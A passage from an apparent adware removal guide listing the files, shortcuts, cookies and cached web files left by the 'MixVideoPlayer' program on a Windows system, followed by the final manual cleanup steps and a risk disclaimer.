    %Program Files%\MixVideoPlayer\Languages\Catalan.ini (3 bytes)
    %Program Files%\MixVideoPlayer\Languages\ChineseS.ini (3 bytes)
    %Program Files%\MixVideoPlayer\mixvideoplayer.affcode (3 bytes)
    %Program Files%\MixVideoPlayer\uninstall.exe (3865 bytes)
    %Program Files%\MixVideoPlayer\icon.ico (12536 bytes)
    %Program Files%\MixVideoPlayer\Languages\Thai.ini (5 bytes)
    %Program Files%\MixVideoPlayer\references\extvideo.png (146 bytes)
    %Program Files%\MixVideoPlayer\references\extaudio.png (310 bytes)
    %Program Files%\MixVideoPlayer\Languages\Russian.ini (5 bytes)
    %Program Files%\MixVideoPlayer\references\ffmpeg.zip (946650 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\nsProcess.dll (4 bytes)
    %Program Files%\MixVideoPlayer\Languages\Bulgarian.ini (5 bytes)
    %Program Files%\MixVideoPlayer\Languages\Hindi.ini (6 bytes)
    %Program Files%\MixVideoPlayer\Languages\Latvian.ini (3 bytes)
    %Program Files%\MixVideoPlayer\NLog.dll (14184 bytes)
    %Program Files%\MixVideoPlayer\Languages\Italian.ini (3 bytes)
    %Program Files%\MixVideoPlayer\Languages\Korean.ini (3 bytes)
    %Program Files%\MixVideoPlayer\Languages\French.ini (3 bytes)
    %Program Files%\MixVideoPlayer\Languages\Romanian.ini (3 bytes)
    %Program Files%\MixVideoPlayer\icon-uninstall.ico (3616 bytes)
    %Program Files%\MixVideoPlayer\Languages\Vietnamese.ini (4 bytes)
    %Program Files%\MixVideoPlayer\Newtonsoft.Json.dll (16944 bytes)
    %Program Files%\MixVideoPlayer\references\taglib-sharp.dll (15536 bytes)
    %Program Files%\MixVideoPlayer\FrameworkControl.exe (12024 bytes)
    %Program Files%\MixVideoPlayer\references\Newtonsoft.Json.dll (15536 bytes)
    %Program Files%\MixVideoPlayer\Languages\Indonesian.ini (3 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\Uninstall MixVideoPlayer.lnk (1 bytes)
    %Program Files%\MixVideoPlayer\Languages\HaitianCreole.ini (3 bytes)
    %Program Files%\MixVideoPlayer\Windows\Thumbs.db (1856 bytes)
    %Program Files%\MixVideoPlayer\Languages\Greek.ini (5 bytes)
    %Program Files%\MixVideoPlayer\Languages\Hebrew.ini (4 bytes)
    %Program Files%\MixVideoPlayer\Languages\Finnish.ini (3 bytes)
    %Program Files%\MixVideoPlayer\references\NDde.dll (3616 bytes)
    %Program Files%\MixVideoPlayer\taglib-sharp.dll (15536 bytes)
    %Program Files%\MixVideoPlayer\mixUpdater.exe (13368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg2.tmp (183067 bytes)
    %Program Files%\MixVideoPlayer\Snowplow.Tracker.dll (784 bytes)
    %Program Files%\MixVideoPlayer\MixVideoPlayer.exe (82435 bytes)
    %Program Files%\MixVideoPlayer\Languages\Japanese.ini (4 bytes)
    %Program Files%\MixVideoPlayer\Languages\Portuguese.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\System.dll (11 bytes)
    %Program Files%\MixVideoPlayer\Sider.dll (5064 bytes)
    %Program Files%\MixVideoPlayer\Windows\logopeq-icon.ico (9608 bytes)
    %Program Files%\MixVideoPlayer\LTV2.exe (6 bytes)
    %Program Files%\MixVideoPlayer\Controls\ifishplayer-icon2.ico (12536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\ZipDLL.dll (6360 bytes)
    %Program Files%\MixVideoPlayer\Languages\Ukrainian.ini (5 bytes)
    %Program Files%\MixVideoPlayer\Microsoft.Win32.TaskScheduler.dll (8560 bytes)
    %Program Files%\MixVideoPlayer\mixvideoplayer.uidnum (23 bytes)
    %Program Files%\MixVideoPlayer\Languages\Arabic.ini (4 bytes)
    %Program Files%\MixVideoPlayer\Languages\Turkish.ini (3 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\MixVideoPlayer.lnk (1 bytes)
    %Program Files%\MixVideoPlayer\Languages\Dutch.ini (3 bytes)
    %Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.dll (3 bytes)
    %Program Files%\MixVideoPlayer\Languages\English.ini (3 bytes)
    %Program Files%\MixVideoPlayer\Controls\Thumbs.db (1552 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Startup\WebBrowserMixVideoPlayer.lnk (1 bytes)
    %Program Files%\MixVideoPlayer\Languages\Spanish.ini (3 bytes)
    %Documents and Settings%\%current user%\Desktop\MixVideoPlayer.lnk (1 bytes)
    %Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.config (377 bytes)
    %Program Files%\MixVideoPlayer\DeleteTasks.exe (10 bytes)
    %Program Files%\MixVideoPlayer\references\Thumbs.db (5 bytes)
    %Program Files%\MixVideoPlayer\Languages\Lithuanian.ini (3 bytes)
    %Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.dll (3 bytes)
    %Program Files%\MixVideoPlayer\LTVNetSdk.dll (14 bytes)
    %Program Files%\MixVideoPlayer\references\folder.png (472 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (511 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\show_ads[1].js (7 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[2].txt (812 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\log.txt (134 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (326 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ga[1].js (2187 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\MainBanner[1].htm (3 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[1].txt (637 bytes)
    %System%\d3d9caps.tmp (1324 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\analytics[1].js (740 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\show_ads[1].js (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\arw[1].png (342 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\jquery.min[1].js (3155 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\analytics[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[2].txt (4225 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery.min[2].js (5043 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ga[2].js (2239 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\banner[1].htm (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\config\config.ini (252 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (15900 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery.min[3].js (4562 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[1].txt (3790 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\arw[1].png (342 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\24075845-11900215[1].png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\loading-install[1].gif (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\style[1].css (114 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\MixVideoPlayerSetup[1].exe (1792168 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i-download[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\loadingBar[1].gif (9823 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\msjava[1].dll (465777 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\progress-bar[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\style[1].css (5083 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bullet-short[1].gif (54 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\99bf1249-796b-43b5-839f-99f7def784ae\mixvideoplayersetup.exe (1792168 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %System%\wbem\Logs\wbemprox.log (684 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
